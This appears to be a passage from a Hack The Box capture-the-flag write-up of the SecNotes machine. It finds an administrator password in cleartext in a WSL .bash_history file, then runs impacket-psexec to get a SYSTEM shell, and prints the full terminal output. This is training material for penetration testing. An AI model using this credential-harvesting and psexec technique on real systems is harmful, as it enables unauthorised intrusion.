WSL Assessment
Earlier, I found out that the target system is a Windows host with WSL installed. The filesystem also appears to be wrapped around an Ubuntu installation.
The administrator user left the .bash_history file with a CLEARTEXT credential in it at the /root directory.
the credential is administrator:u6!4ZwgwOM#^OBf#Nwnh
Privilege Escalation
┌──(kali㉿kali)-[~/archive/htb/labs/secnotes]
└─$ impacket-psexec 'administrator:u6!4ZwgwOM#^OBf#Nwnh@secnotes.htb' -target-ip $IP
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 10.10.10.97.....
[*] Found writable share ADMIN$
[*] Uploading file tQzBasvo.exe
[*] Opening SVCManager on 10.10.10.97.....
[*] Creating service sYNp on 10.10.10.97.....
[*] Starting service sYNp.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17134.228]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32> whoami
nt authority\system
C:\WINDOWS\system32> hostname
SECNOTES
C:\WINDOWS\system32> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : htb
IPv6 Address. . . . . . . . . . . : dead:beef::24b
IPv6 Address. . . . . . . . . . . : dead:beef::90a2:5085:1f27:d4a4
Temporary IPv6 Address. . . . . . : dead:beef::150e:bb88:4712:b500
Link-local IPv6 Address . . . . . : fe80::90a2:5085:1f27:d4a4%11
IPv4 Address. . . . . . . . . . . : 10.10.10.97
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%11
10.10.10.2System Level Compromise